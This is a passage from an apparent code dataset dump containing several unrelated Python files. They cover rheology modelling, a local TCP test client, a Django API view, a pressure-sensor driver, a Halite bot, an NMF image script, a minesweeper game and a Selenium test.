Has to be 1 <= N <= 5.\r\n xmin : float\r\n The start of the integration range\r\n xmax : float\r\n The end of the integration range\r\n\r\n Returns\r\n -------\r\n points : np.ndarray\r\n The points of the quadrature\r\n w : np.ndarray\r\n The weights of the points\r\n \"\"\"\r\n if N < 1:\r\n raise ValueError()\r\n\r\n if N == 1:\r\n points = [0]\r\n w = [2]\r\n\r\n if N == 2:\r\n points = [-np.sqrt(1 / 3), np.sqrt(1 / 3)]\r\n w = [1, 1]\r\n\r\n if N == 3:\r\n points = [-np.sqrt(3 / 5), 0, np.sqrt(3 / 5)]\r\n w = [5 / 9, 8 / 9, 5 / 9]\r\n\r\n if N == 4:\r\n points = [-np.sqrt(3 / 7 - 2 / 7 * np.sqrt(6 / 5)), +np.sqrt(3 / 7 - 2 / 7 * np.sqrt(6 / 5)),\r\n -np.sqrt(3 / 7 + 2 / 7 * np.sqrt(6 / 5)), +np.sqrt(3 / 7 + 2 / 7 * np.sqrt(6 / 5))]\r\n w = [(18 + np.sqrt(30)) / 36, (18 + np.sqrt(30)) / 36, (18 - np.sqrt(30)) / 36, (18 - np.sqrt(30)) / 36]\r\n\r\n if N == 5:\r\n points = [0,\r\n -1 / 3 * np.sqrt(5 - 2 * np.sqrt(10 / 7)), +1 / 3 * np.sqrt(5 - 2 * np.sqrt(10 / 7)),\r\n -1 / 3 * np.sqrt(5 + 2 * np.sqrt(10 / 7)), +1 / 3 * np.sqrt(5 + 2 * np.sqrt(10 / 7))]\r\n w = [128 / 225, (322 + 13 * np.sqrt(70)) / 900, (322 + 13 * np.sqrt(70)) / 900, (322 - 13 * np.sqrt(70)) / 900,\r\n (322 - 13 * np.sqrt(70)) / 900]\r\n\r\n if N > 5:\r\n raise ValueError()\r\n\r\n points = np.array(points)\r\n w = np.array(w)\r\n factor = (xmax - xmin) / 2\r\n points = factor * points + (xmax + xmin) / 2\r\n w = w * factor\r\n return points, w\r\n\r\n\r\ndef combineQuadrature(p1_w1: Sequence, p2_w2: Sequence) -> (np.ndarray, np.ndarray, np.ndarray):\r\n \"\"\"\r\n Combine the quadratures of two different axes.\r\n\r\n Parameters\r\n ----------\r\n p1_w1 : tuple\r\n the points and weights for the first axis\r\n p2_w2 : tuple\r\n the points and weights for the second axis\r\n\r\n Returns\r\n -------\r\n x : np.ndarray\r\n the points for the first axis\r\n y : np.ndarray\r\n the points for the second axis\r\n w : np.ndarray\r\n the combined weights for the points\r\n \"\"\"\r\n p1, w1 = p1_w1\r\n p2, w2 = p2_w2\r\n x, y = [f.ravel() for f in np.meshgrid(p1, p2)]\r\n w = (w1[:, None] * w2[None, :]).ravel()\r\n return x, y, w\r\n\r\n\r\ndef getShearRheometerStress(gamma: np.ndarray, material: Material, s: np.ndarray = None) -> (np.ndarray, np.ndarray):\r\n r\"\"\"\r\n Get the stress for a given strain of the material in a shear rheometer.\r\n\r\n The following shear deformation :math:`\\mathbf{F}` is applied to the material:\r\n\r\n .. math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n 1 & \\gamma & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & 1 \\\\\r\n \\end{pmatrix}\r\n\r\n and the resulting stress is obtained by calculating numerically the derivative of the energy density :math:`W` with\r\n respect to the strain :math:`\\gamma`:\r\n\r\n .. 
math::\r\n \\sigma(\\gamma) = \\frac{dW(\\mathbf{F}(\\gamma))}{d\\gamma}\r\n\r\n Parameters\r\n ----------\r\n gamma : ndarray\r\n The applied strain.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n strain : ndarray\r\n The strain values.\r\n stress : ndarray\r\n The resulting stress.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F = np.eye(3)\r\n F = np.tile(F, (gamma.shape[0], 1, 1))\r\n F[:, 0, 1] = np.tan(gamma)\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n dW = np.diff(W) / np.diff(gamma)\r\n return gamma[:-1] + np.diff(gamma) / 2, dW\r\n\r\n\r\ndef getShearRheometerStressRotation(gamma, material, H=1e-3, R=10e-3, s=30, q=2):\r\n if isinstance(s, int):\r\n s = buildBeams(s)\r\n\r\n x_r, z_h, w = combineQuadrature(getQuadrature(q, 0, 1), getQuadrature(q, 0, 1))\r\n\r\n F = np.zeros((gamma.shape[0], len(z_h), 3, 3))\r\n theta = gamma * H / R\r\n theta_p = theta[:, None] * z_h[None, :]\r\n\r\n cos, sin = np.cos(theta_p), np.sin(theta_p)\r\n xtheta_h = x_r * theta[:, None] * R / H\r\n F[:, :, 0, 0], F[:, :, 0, 1], F[:, :, 0, 2] = cos, -sin, -sin * xtheta_h\r\n F[:, :, 1, 0], F[:, :, 1, 1], F[:, :, 1, 2] = sin, cos, cos * xtheta_h\r\n F[:, :, 2, 2] = 1\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n W = np.average(W, axis=-1, weights=w)\r\n dW = np.diff(W) / np.diff(gamma)\r\n\r\n return gamma[:-1] + np.diff(gamma) / 2, dW\r\n\r\n\r\ndef getStretchThinning(lambda_h, lambda_v, material, s=None):\r\n r\"\"\"\r\n Get the thinning of the material for streching.\r\n\r\n The following deformation :math:`\\mathbf{F}` is applied to the material, composed of a horizontal and a vertical\r\n stretching:\r\n\r\n .. math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n \\lambda_h & 0 & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & \\lambda_v \\\\\r\n \\end{pmatrix}\r\n\r\n the resulting energy density :math:`W(\\mathbf{F}(\\lambda_h,\\lambda_v))` is then minimized numerically for every\r\n :math:`\\lambda_h` to obtain the :math:`\\lambda_v` that results in the lowest energy of the system.\r\n\r\n Parameters\r\n ----------\r\n lambda_h : ndarray\r\n The applied stretching in horizontal direction.\r\n lambda_v : ndarray\r\n The different values for thinning to test. The value with the lowest energy for each horizontal stretch is\r\n returned.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n lambda_h : ndarray\r\n The horizontal stretching values.\r\n lambda_v : ndarray\r\n The vertical stretching that minimizes the energy for the horizontal stretching.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F00, F22 = np.meshgrid(lambda_v, lambda_h)\r\n F11 = np.ones_like(F00)\r\n F = np.dstack((F00, F11, F22))\r\n\r\n s_bar = np.einsum(\"hvj,bj->hvjb\", F, s)\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n eps = material.energy(s_abs - 1)\r\n W = np.mean(eps, axis=-1)\r\n\r\n index = np.argmin(W, axis=1)\r\n return lambda_h, lambda_v[index]\r\n\r\n\r\ndef getExtensionalRheometerStress(epsilon, material, s=None):\r\n r\"\"\"\r\n Get the stress for a given strain of the material in an extensional rheometer.\r\n\r\n The following deformation :math:`\\mathbf{F}` is applied to the material:\r\n\r\n .. 
math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n \\epsilon & 0 & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & 1 \\\\\r\n \\end{pmatrix}\r\n\r\n and the resulting stress is obtained by calculating numerically the derivative of the energy density :math:`W` with\r\n respect to the strain :math:`\\epsilon`:\r\n\r\n .. math::\r\n \\sigma(\\gamma) = \\frac{dW(\\mathbf{F}(\\gamma))}{d\\epsilon}\r\n\r\n\r\n Parameters\r\n ----------\r\n epsilon : ndarray\r\n The applied strain.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n strain : ndarray\r\n The strain values.\r\n stress : ndarray\r\n The resulting stress.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F = np.eye(3)\r\n F = np.tile(F, (epsilon.shape[0], 1, 1))\r\n F[:, 0, 0] = epsilon\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n dW = np.diff(W) / np.diff(epsilon)\r\n return epsilon[:-1] + np.diff(epsilon) / 2, dW\r\n\r\n\r\nimport numpy as np\r\nfrom scipy import interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom saenopy.materials import SemiAffineFiberMaterial\r\n\r\ndef fit_error(xy, xy0, w=None):\r\n # split the data\r\n x, y = xy\r\n x0, y0 = xy0.T\r\n # interpolate the fit to ensure we have values at the correct x positions\r\n f = interpolate.interp1d(x, y, bounds_error=False)\r\n # evaluate the interpolated fit at the x0 values and calculate the squared difference to the y0 values\r\n difference = (y0-f(x0))**2\r\n # if we have no weights\r\n if w is None:\r\n # just take the mean (ignoring nans)\r\n return np.sqrt(np.nanmean(difference))\r\n # if not ignore the nans by finding the indices\r\n indices = ~np.isnan(difference)\r\n # and average with the given weights\r\n return np.sqrt(np.average(difference[indices], weights=w[indices]))\r\n\r\n\r\ndef get_cost_function(func, data_shear1, params):\r\n # find a reasonable range of shear values\r\n x0 = data_shear1[:, 0]\r\n dx = x0[1] - x0[0]\r\n gamma1 = np.linspace(np.min(x0), np.max(x0), 1000)\r\n\r\n # define weights for logarithmic weighting of points of the shear data\r\n weights1 = np.diff(np.log(x0), append=np.log(x0[-1] + np.diff(x0[-3:-1])[0])) ** 2\r\n\r\n # weights1[:] = 1\r\n\r\n def cost(p):\r\n material = SemiAffineFiberMaterial(*params(p))\r\n # print(material)\r\n return fit_error(func(gamma1, material), data_shear1, weights1)\r\n\r\n def plot(p):\r\n def plot_me():\r\n material = SemiAffineFiberMaterial(*params(p))\r\n plt.plot(data_shear1[:, 0], data_shear1[:, 1], \"o\", label=\"data\")\r\n\r\n x, y = func(gamma1, material)\r\n plt.plot(x, y, \"r-\", lw=3, label=\"model\")\r\n return plot_me\r\n\r\n return cost, plot\r\n\r\n\r\ndef get_cost_function_log(func: callable, data_shear1: np.ndarray, params: Sequence):\r\n # find a reasonable range of shear values\r\n x0 = data_shear1[:, 0]\r\n dx = x0[1] - x0[0]\r\n gamma1 = np.arange(0.004, 0.25, 0.001)\r\n\r\n # define weights for logarithmic weighting of points of the shear data\r\n weights1 = np.diff(np.log(x0), append=np.log(x0[-1] + np.diff(x0[-3:-1])[0])) ** 2\r\n # weights1[:] = 1\r\n\r\n data_shear1 = np.log(data_shear1)\r\n\r\n def cost(p):\r\n material = SemiAffineFiberMaterial(*params(p))\r\n # print(material)\r\n return fit_error(np.log(func(gamma1, material)), data_shear1, weights1)\r\n\r\n return cost\r\n\r\n\r\ndef minimize(cost_data: list, parameter_start: Sequence, method='Nelder-Mead', maxfev:int = 1e4, **kwargs):\r\n costs 
= []\r\n plots = []\r\n\r\n for func, data, params in cost_data:\r\n if func == getStretchThinning:\r\n def func(x, material):\r\n lambda_v = np.arange(0, 1.1, 0.01)\r\n return getStretchThinning(x, lambda_v, material)\r\n c, p = get_cost_function(func, data, params)\r\n costs.append(c)\r\n plots.append(p)\r\n\r\n from tqdm.notebook import tqdm\r\n pbar = tqdm(total=maxfev)\r\n\r\n # define the cost function\r\n def cost(p):\r\n pbar.update(1)\r\n return sum([c(p) for c in costs])\r\n\r\n # minimize the cost with reasonable start parameters\r\n from scipy.optimize import minimize\r\n sol = minimize(cost, parameter_start, method=method, options={'maxfev': maxfev}, **kwargs)\r\n\r\n if sol.success is True:\r\n pbar.close()\r\n\r\n def plot_all():\r\n subplot_index = 0\r\n subplot_dict = {}\r\n for func, data, params in cost_data:\r\n if func not in subplot_dict:\r\n subplot_index += 1\r\n subplot_dict[func] = subplot_index\r\n\r\n for func in subplot_dict:\r\n subplot_dict[func] = plt.subplot(1, subplot_index, subplot_dict[func])\r\n if func == getShearRheometerStress or func == getExtensionalRheometerStress:\r\n plt.xlabel(\"strain\")\r\n plt.ylabel(\"stress\")\r\n if func == getStretchThinning:\r\n plt.xlabel(\"horizontal stretch\")\r\n plt.ylabel(\"vertical contraction\")\r\n\r\n for (func, data, params), p in zip(cost_data, plots):\r\n plt.sca(subplot_dict[func])\r\n p(sol.x)()\r\n\r\n return sol.x, plot_all\r\n","sub_path":"saenopy/macro.py","file_name":"macro.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352475785","text":"#!/usr/bin/python\nimport socket\nhost = '127.0.0.1'\nport = 18912\nBUFSIZE = 1024\ntcpClient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcpClient.connect((host, port))\nwhile True:\n\tdata = raw_input('>enter:')\n\tif not data:\n\t\tbreak\n\ttcpClient.send(data)\n\tdata = tcpClient.recv(BUFSIZE)\n\tif not data:\n\t\tbreak\ntcpClient.close()\n","sub_path":"netsvr/test/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179341373","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport datetime\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom core.constants import TRAIN_CLASSES\nfrom core.models import Train\n\n\ndef availability(request):\n return render(request, 'availability.html')\n\n\ndef availability_api(request, train_number, from_city, to_city,\n date_of_journey, class_name):\n train = get_object_or_404(Train, number=train_number)\n errors = []\n\n # date of journey validations\n try:\n doj = datetime.datetime.strptime(date_of_journey, \"%d-%m-%Y\")\n except:\n errors.append({\n 'date-of-journey': 'Invalid date of Journey. 
'\n 'Please enter in \"12-04-2017\" form.',\n })\n\n # class validations\n if class_name not in TRAIN_CLASSES:\n errors.append({\n 'class': 'Invalid Class'\n })\n elif class_name not in train.data.get('classes', {}):\n errors.append({\n 'class': \"{} doesn't have {}\".format(train,\n TRAIN_CLASSES[class_name])\n })\n\n # return errors if there are\n if errors:\n return JsonResponse({'errors': errors}, status='400')\n\n # return the computed probability and data\n return JsonResponse({\n 'data': {\n 'train': str(train),\n 'from': from_city,\n 'to': to_city,\n 'date_of_journey': date_of_journey,\n 'class_name': class_name,\n },\n 'probability': 0,\n })\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415888621","text":"def MS5803(i2c, power_pin=None, ground_pin=None):\r\n \"\"\" A micropython function for reading pressure and temperature from an MS5803 sensor.\r\n \r\n The function assumes that the MS5803 is hooked up according to instructions at \r\n the `cave pearl project `_.\r\n Power and ground should be connected through a 100 nf (104) decoupling capacitor, and CSB\r\n should be pulled high using a 10 kOhm resistor. Tested with MS5803_BA. \r\n Code modified from code originally developed for raspberry pi at the `control everything community `_.\r\n \r\n Parameters\r\n ----------\r\n\ti2c : :obj:'machine.I2C'\r\n\t\tAn I2C bus object\r\n\tpower_pin : :obj:'machine.PIN', optional\r\n\t\tPin object representing the pin used to power the MS5803 \r\n\tground_pin : :obj:'machine.PIN', optional\r\n\t\tPin object representing the pin used to ground the MS5803 (optional)\r\n Returns\r\n -------\r\n pressure : float\r\n Pressure in hPa.\r\n temperature : float\r\n Temperature in degrees C.\r\n \r\n Example\r\n -------\r\n >>> from machine import I2C, Pin\r\n >>> import pressure\r\n >>> i2c = I2C(scl='X9', sda='X10', freq = 100000)\r\n >>> power_pin = Pin('Y7', Pin.OUT_PP)\r\n >>> ground_pin = Pin('Y8', Pin.OUT_PP)\r\n >>> [pres, ctemp] = pressure.MS5803(i2c, power_pin, ground_pin)\r\n \r\n \"\"\"\r\n import time\r\n \r\n #turn on power and turn off ground if necessary\r\n if not(power_pin is None):\r\n power_pin.value(1)\r\n \r\n if not(ground_pin is None):\r\n ground_pin.value(0)\r\n \r\n #check if device is connected--should be at address 118\r\n #i2c.scan()\r\n \r\n # MS5803_05BA address, 0x76(118)\r\n # 0x1E(30) Reset command\r\n reset_command = bytearray([0x1E])\r\n i2c.writeto(0x76, reset_command)\r\n\r\n time.sleep(0.5)\r\n\r\n # Read 12 bytes of calibration data\r\n # Read pressure sensitivity\r\n data = bytearray(2)\r\n data = i2c.readfrom_mem(0x76, 0xA2, 2)\r\n C1 = data[0] * 256 + data[1]\r\n\r\n # Read pressure offset\r\n data = i2c.readfrom_mem(0x76, 0xA4, 2)\r\n C2 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of pressure sensitivity\r\n data = i2c.readfrom_mem(0x76, 0xA6, 2)\r\n C3 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of pressure offset\r\n data = i2c.readfrom_mem(0x76, 0xA8, 2)\r\n C4 = data[0] * 256 + data[1]\r\n\r\n # Read reference temperature\r\n data = i2c.readfrom_mem(0x76, 0xAA, 2)\r\n C5 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of the temperature\r\n data = i2c.readfrom_mem(0x76, 0xAC, 2)\r\n C6 = data[0] * 256 + data[1]\r\n\r\n # MS5803_05BA address, 0x76(118)\r\n # 0x40(64) Pressure conversion(OSR = 256) command\r\n pressure_command = 
bytearray([0x40])\r\n i2c.writeto(0x76, pressure_command)\r\n\r\n time.sleep(0.5)\r\n\r\n # Read digital pressure value\r\n # Read data back from 0x00(0), 3 bytes\r\n # D1 MSB2, D1 MSB1, D1 LSB\r\n value = bytearray(3)\r\n value = i2c.readfrom_mem(0x76, 0x00, 3)\r\n D1 = value[0] * 65536 + value[1] * 256 + value[2]\r\n\r\n # MS5803_05BA address, 0x76(118)\r\n # 0x50(64) Temperature conversion(OSR = 256) command\r\n temperature_command = bytearray([0x50])\r\n i2c.writeto(0x76, temperature_command)\r\n time.sleep(0.5)\r\n\r\n # Read digital temperature value\r\n # Read data back from 0x00(0), 3 bytes\r\n # D2 MSB2, D2 MSB1, D2 LSB\r\n\r\n value = i2c.readfrom_mem(0x76, 0x00, 3)\r\n D2 = value[0] * 65536 + value[1] * 256 + value[2]\r\n\r\n dT = D2 - C5 * 256\r\n TEMP = 2000 + dT * C6 / 8388608\r\n OFF = C2 * 262144 + (C4 * dT) / 32\r\n SENS = C1 * 131072 + (C3 * dT ) / 128\r\n T2 = 0\r\n OFF2 = 0\r\n SENS2 = 0\r\n\r\n if TEMP > 2000 :\r\n T2 = 0\r\n OFF2 = 0\r\n SENS2 = 0\r\n elif TEMP < 2000 :\r\n T2 = 3 * (dT * dT) / 8589934592\r\n OFF2 = 3 * ((TEMP - 2000) * (TEMP - 2000)) / 8\r\n SENS2 = 7 * ((TEMP - 2000) * (TEMP - 2000)) / 8\r\n if TEMP < -1500 :\r\n SENS2 = SENS2 + 3 * ((TEMP + 1500) * (TEMP +1500))\r\n\r\n TEMP = TEMP - T2\r\n OFF = OFF - OFF2\r\n SENS = SENS - SENS2\r\n pressure = ((((D1 * SENS) / 2097152) - OFF) / 32768.0) / 100.0\r\n cTemp = TEMP / 100.0\r\n fTemp = cTemp * 1.8 + 32\r\n\r\n # Output data to screen\r\n print(\"Pressure : %.2f mbar\" %pressure)\r\n print(\"Temperature in Celsius : %.2f C\" %cTemp)\r\n print(\"Temperature in Fahrenheit : %.2f F\" %fTemp)\r\n \r\n if not(power_pin is None):\r\n power_pin.value(0)\r\n \r\n return([pressure, cTemp])","sub_path":"pressure.py","file_name":"pressure.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597801236","text":"import hlt\nfrom hlt import constants\nfrom hlt.positionals import Direction, Position\nimport functions\n\nimport random\n# (print statements) are reserved for the engine-bot communication.\nimport logging\n\n\n\"\"\" <<<Game Begin>>> \"\"\"\n\n# This game object contains the initial game state.\ngame = hlt.Game()\n\ngh = {}\n\n# At this point \"game\" variable is populated with initial map data.\n# This is a good place to do computationally expensive start-up pre-processing.\n# As soon as you call \"ready\" function below, the 2 second per turn timer will start.\ngame.ready(\"Testbot v5\")\n\n# Now that your bot is initialized, save a message to yourself in the log file with some important information.\n# Here, you log here your id, which you can always fetch from the game object by using my_id.\nlogging.info(\"Successfully created bot! 
My Player ID is {}.\".format(game.my_id))\n\n\"\"\" <<<Game Loop>>> \"\"\"\n\nwhile True:\n game.update_frame()\n # You extract player metadata and the updated map metadata here for convenience.\n me = game.me\n if game.turn_number == 1:\n shipyard = me.shipyard.position\n '''logging.info(str(me.shipyard))\n logging.info(type(me.shipyard))\n try:\n logging.info(type(me.shipyard.position))\n logging.info(str(me.shipyard.position))\n except:\n pass'''\n game_map = game.game_map\n\n command_queue = []\n move_queue = []\n\n for ship in me.get_ships(): \n if ship.position == shipyard:\n gh[ship.id] = False \n com, move_queue = functions.max_halite(game_map, ship, move_queue)\n command_queue.append(com)\n \n elif gh[ship.id] or ship.halite_amount >700:\n move = game_map.naive_navigate(ship, shipyard)\n if move != Direction.Still:\n pos = Position(move[0], move[1])+ship.position\n if pos in move_queue:\n move = Direction.Still\n else:\n move_queue.append(pos)\n command_queue.append(ship.move(move))\n \n \n #game_map.naive_navigate(ship, shipyard)))\n gh[ship.id] = True\n \n \n elif game_map[ship.position].halite_amount >= constants.MAX_HALITE / 10:\n command_queue.append(ship.stay_still())\n \n else:\n com, move_queue = functions.max_halite(game_map, ship, move_queue)\n command_queue.append(com)\n \n '''\n if ship.halite_amount>400:\n command_queue.append(\n ship.move(\n game_map.naive_navigate(ship, shipyard)))\n \n \n elif game_map[ship.position].halite_amount < constants.MAX_HALITE / 10:\n command_queue.append(\n ship.move(\n random.choice([ Direction.North, Direction.South, Direction.East, Direction.West ])))\n else:\n command_queue.append(ship.stay_still())\n '''\n if game.turn_number<200 and me.halite_amount >= constants.SHIP_COST and not game_map[me.shipyard].is_occupied:\n command_queue.append(me.shipyard.spawn())\n\n # Send your moves back to the game environment, ending this turn.\n game.end_turn(command_queue)\n\n","sub_path":"MyBotv4.py","file_name":"MyBotv4.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583553191","text":"#https://qiita.com/hibit/items/8f0525ab1b616061c630\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import NMF\nimport copy\n\nsample_num = 1000\n\n\nX = []\nY = []\nsample_num += 1\n\nfor i in range(1, sample_num):\n filename = './nmf_ex4/' + str(i) + '.png'\n img = cv2.imread(filename)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = cv2.bitwise_not(img)\n img = img.reshape(64*64)/255\n X.append(img)\n\n#each image is a 3-D ndarray of rows (height) x columns (width) x color (3) https://note.nkmk.me/python-opencv-imread-imwrite/\n#print(img.shape)\nY = copy.deepcopy(X)\n'''\nX = np.array(X)\nnmf = NMF(n_components=15)\nnmf.fit(X)\nX_nmf = nmf.transform(X)\nprint(X_nmf.shape, nmf.components_.shape)\n'''\n\nY = np.array(Y)\nY = Y.T\nprint(Y.shape)\nY = Y.reshape(4096, -1)\nnmf2 = NMF(n_components=90)\nW = nmf2.fit_transform(Y) # fit the model\nH = nmf2.components_\n\nprint(W.shape, H.shape)\n#print(H.shape)\n\nim = np.dot(W, H)\n#print(im.shape)\nim = im.T\n#print(im.shape, im[0].shape)\nprint(im[0].reshape(64, 64).shape)\n\nplt.imshow(im[0].reshape(64, 64),cmap='Greys')\nplt.show()\n\n","sub_path":"nmf/nmf_ex4_anime_plus_grey.py","file_name":"nmf_ex4_anime_plus_grey.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"425704640","text":"import random\nfrom tkinter import *\n\nclass Game():\n def __init__(self):\n\n self.root = Tk()\n self.root.title(\"Minröj\")\n self.root.geometry(\"+800+200\")\n self.frame = Frame(self.root)\n self.frame.pack(side=TOP, padx=10, pady=10)\n self.frameHead = Frame(self.root)\n self.frameHead.pack(side=BOTTOM, pady=10)\n self.modeButton = Button(self.frameHead, command=lambda: self.clickMode(), text=\"Skjut\")\n self.modeButton.pack()\n\n self.flag = 0\n self.gridSize = int(input(\"Spelplansstorlek: \"))\n self.mineCount = int(input(\"Antal minor: \"))\n self.flagCount = 0\n self.mineLeft = self.mineCount\n self.board = self.gameBoard(self.gridSize, self.root, self.frame)\n self.mineRandList = self.randMines(self.board, self.gridSize, self.mineCount)\n self.insertMines(self.board, self.mineRandList)\n self.checkMines(self.board)\n\n #self.showBoard(self.board)\n\n def gameBoard(self, gridSize, root, frame):\n board = []\n for i in range(1,gridSize+1):\n col = []\n for j in range(1,gridSize+1): \n col.append(Mine(0, 0, 0, j-1, i-1, 0, root, frame))\n board.append(col)\n return board\n\n def randMines(self, board, gridSize, mineCount):\n mineList = []\n mineRandList = []\n for i in board:\n for j in i:\n mineList.append((j.cordX, j.cordY))\n for i in range(int(mineCount)):\n mineListCheck = mineList.pop(mineList.index(random.choice(mineList)))\n mineRandList.append(mineListCheck)\n return mineRandList\n\n def insertMines(self, board, mineRandList):\n for i in board:\n for k in i:\n mineCords = (k.cordX, k.cordY)\n if mineCords in mineRandList:\n k.mineStatus = 1\n\n def checkMines(self, board):\n for i in board:\n for k in i:\n moves = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n for j in moves:\n try:\n cordNewX = k.cordX + j[0]\n cordNewY = k.cordY + j[1]\n\n if cordNewX > -1 and cordNewY > -1:\n k.minesAround += board[cordNewY][cordNewX].mineStatus\n\n except IndexError:\n pass\n\n## def showBoard(self, board):\n## row = []\n## for i in board:\n## col = []\n## for k in i:\n## if(k.mineStatus == 1):\n## col.append(\"#\")\n## else:\n## col.append((str(k.minesAround)))\n## row.append(col)\n## for i in row:\n## print(i)\n \n \n def click(self, x, y):\n if(self.flag == 0):\n \n if(self.board[y][x].mineStatus == 0):\n \n if(self.board[y][x].minesAround != 0): #Visa ruta \n self.board[y][x].button[\"text\"] = self.board[y][x].minesAround\n self.board[y][x].clickStatus = 1\n else:\n self.getNeigh(x, y) #Visa omkringliggande \n\n else: #Game Over\n for i in self.board:\n for k in i:\n if(k.mineStatus == 1):\n k.button[\"text\"] = \"#\"\n else:\n if(k.minesAround == 0):\n k.button[\"text\"] = \"\"\n else:\n k.button[\"text\"] = k.minesAround\n else: #Flagga ruta\n if(self.board[y][x].clickStatus == 0):\n \n if(self.board[y][x].flagStatus == 0): \n self.board[y][x].flagStatus = 1\n self.flagCount +=1\n self.board[y][x].button[\"text\"] = \"F\"\n if(self.board[y][x].mineStatus == 1):\n self.mineLeft -= 1\n # print(\"minor kvar: \", self.mineLeft)\n # print(\"placerade flaggor: \", self.flagCount)\n if(self.mineLeft == 0 and self.flagCount <= self.mineCount):\n print(\"Grattis du vann\")\n else:\n self.board[y][x].flagStatus = 0\n self.flagCount -=1\n self.board[y][x].button[\"text\"] = \"\"\n if(self.board[y][x].mineStatus == 1):\n self.mineLeft += 1\n else:\n pass\n\n \n def getNeigh(self, x, y):\n moves = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n zeroList = [(x, y)]\n while(zeroList):\n for j in moves:\n try:\n 
cordNewX = zeroList[0][0] + j[0]\n cordNewY = zeroList[0][1] + j[1]\n\n if (cordNewX > -1 and cordNewY > -1) and (cordNewX < game.gridSize and cordNewY < game.gridSize):\n if(self.board[cordNewY][cordNewX].clickStatus == 0):\n\n if(self.board[cordNewY][cordNewX].minesAround != 0):\n self.board[cordNewY][cordNewX].button[\"text\"] = self.board[cordNewY][cordNewX].minesAround\n self.board[cordNewY][cordNewX].clickStatus = 1\n else:\n zeroList.append((cordNewX, cordNewY))\n self.board[cordNewY][cordNewX].button[\"text\"] = \"0\"\n self.board[cordNewY][cordNewX].clickStatus = 1\n \n except IndexError:\n pass\n \n self.board[y][x].clickStatus = 1\n zeroList.pop(0)\n self.board[y][x].button[\"text\"] = \"0\"\n \n def clickMode(self):\n if(self.flag == 0):\n self.flag = 1\n self.modeButton[\"text\"] = \"Flagga\"\n else:\n self.flag = 0\n self.modeButton[\"text\"] = \"Skjut\"\n\nclass Mine():\n def __init__(self, mineStatus, clickStatus, minesAround, cordX, cordY, flagStatus, root, frame):\n self.mineStatus = mineStatus\n self.clickStatus = clickStatus\n self.minesAround = minesAround\n self.cordX = cordX\n self.cordY = cordY\n self.flagStatus = flagStatus\n \n self.button = Button(\n frame,\n command=lambda: Game.click(game, self.cordX, self.cordY)\n )\n self.button.config(width=\"4\",height=\"2\", bg=\"black\", fg=\"white\")\n self.button.grid(column=self.cordX, row=self.cordY)\n\ngame = Game()\n \n#def main():\n# root = Tk()\n# game = Game(root)\n#main()\n\n\n \n\n","sub_path":"MarcusMinesweeper.py","file_name":"MarcusMinesweeper.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614590561","text":"import pytest\nimport time\n\nfrom .pages.basket_page import BasketPage\nfrom .pages.login_page import LoginPage\nfrom .pages.product_page import ProductPage\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207\"\n\n\nclass TestProductPage:\n\n @pytest.mark.xfail\n def test_guest_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n 